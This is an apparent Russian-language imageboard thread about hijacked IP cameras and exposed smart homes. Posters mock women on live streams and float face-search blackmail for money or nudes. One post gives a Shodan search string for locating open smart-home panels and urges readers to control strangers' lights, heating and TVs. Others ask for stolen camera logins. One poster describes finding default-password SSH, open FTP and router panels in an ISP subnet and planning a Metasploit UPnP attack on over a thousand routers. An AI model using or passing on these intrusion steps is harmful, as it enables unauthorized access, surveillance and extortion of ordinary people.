Одинокие бухие похотливые милфы светящие всеми частями тела, компании бухих тпшек светящие сиськами просто ради прикола.
Ни в одной стране мира нету такого количества одиноких пьяных похотливых бабищ лёгкого поведения в таком количестве, и ведущих прямые трансляции.
Стыдно господа.
35.128.135.255
Halliburton Company
Ну вот, теперь на всех можно копить компромат с searchface.
Можно шантажировать и требовать денег или нуд, но я конечно же этого делать не буду.
Пошла массовка..
лавочку прикрыли, ссылки на вк убрали.
ктонибудь знает как найти id вк по ссылке на фото userapi.com?
там должен быть какойто способ через API VK.
хотя кому я это пишу, тред уже не втренде
Аниош, запили фак плиз. Ну или хотя бы расскажи, как парсить видосы и трансы с перископа.
https://github.com/baliscope/periapi
бот на selenium
Спасибо. Шикарная штука.
А что за бот, который подписывается?
>перескоп
слушай анонче, а ты не знаешь случаем, есть ли сейчас рабочие проги, чтоб в перескопопараше зрителей накручивать можно было?
Набегов на умные дома тред.
Анон, ты играл когда-нибудь в "Как достать соседа"? Теперь у тебя есть возможность поиграть в это ирл, а заодно показать, что лучше лишний раз поднять жопу, чем потом жалеть о потраченных деньгах, валяясь на диване.
Итак, ты готов коммунист доморощенный? Нам потребуется браузер и аккаунт на шодане.
Что ты будешь делать? Вставь в поисковую строку шодана вот эти буковки и циферки "http.favicon.hash:1903390397 200", а затем можешь как угодно фильтровать и искать умные дома по всему миру. Первая неприрывная надпись ищет как раз те самые умные дома, а цифра 200 фильтрует их по открытости.
Заходи на сайтики, выключай свет, включай тёплые полы и телек, или делай это наоборот. Весь дом в твоих руках, анон
как
Поделитесь, пожалуйста кто-то своими "Logins" и "Passwords".
Так и должно быть? Типа она разлагает?
[email protected]
есть чо на обмен?
иди нахуйЯ спросил канал(чат) в телеге где все делятся, без определенных запросов на обмен и коммерцию...
выкладывают обычные камеры, но там есть еще и какая-то закрытая группа, которая стоит денег.
если кто-то желает, может проверить.
В общем списке она появляется как надо, но в списке для проигрывания нету
Что можно сделать с этим?
Неактивные камеры удалил, которые добавлял до этого работают, клиент использую IVMS 4200 на компе
Теперь вопрос, могу ли я на первом этаже (напомню видеорегистратор на втором) просто врубить еще одну IP камеру в интернет розетку, а на втором из пустой розетки влепить витую пару в коммутатор, и поискать в видеорегистраторе новую камеру или надо вести провод прям от камеры до коммутатора на втором?
>Сразу скажу, я от темы камплюктеров далек.
Нанимай сисадмина. Из твоего текста топология сети непонятна.
нормально все заработало только через осла, через лису никак
Впринципе в подсети провайдера есть ещё целая куча вкусностей помимо камер, нашёл несколько открытых ftp сервер, открытых ssh со стандартными паролями и веб-интерфейсами Wifi роутеров, потом планирую пройти Metasploit-ом с плагином для пентеста UPnP, так как практически у каждого роутера из всех 1456 штук присутствует сабж первой версии и на него есть эксплоит
Есть какие-то альтернативы хикки? Чет с ней очень странно всё - сначала норм идет, а потом стаггер какой-то и всё очень долго.
как же сексуально он ее тискает. а еще тянка руку его направила типо вот тут трогай
не подключена нет ни видео регистратора
ни облака
ни встроенной карты
только корообки в реал тайме.....
https://www.ozon.ru/product/ip-kamera-videonablyudeniya-wifi-besder-p3s-8-mp-ptz-kamera-s-dvumya-ekranami-6mm-12mm-zoom-890375505/
такая пойдет?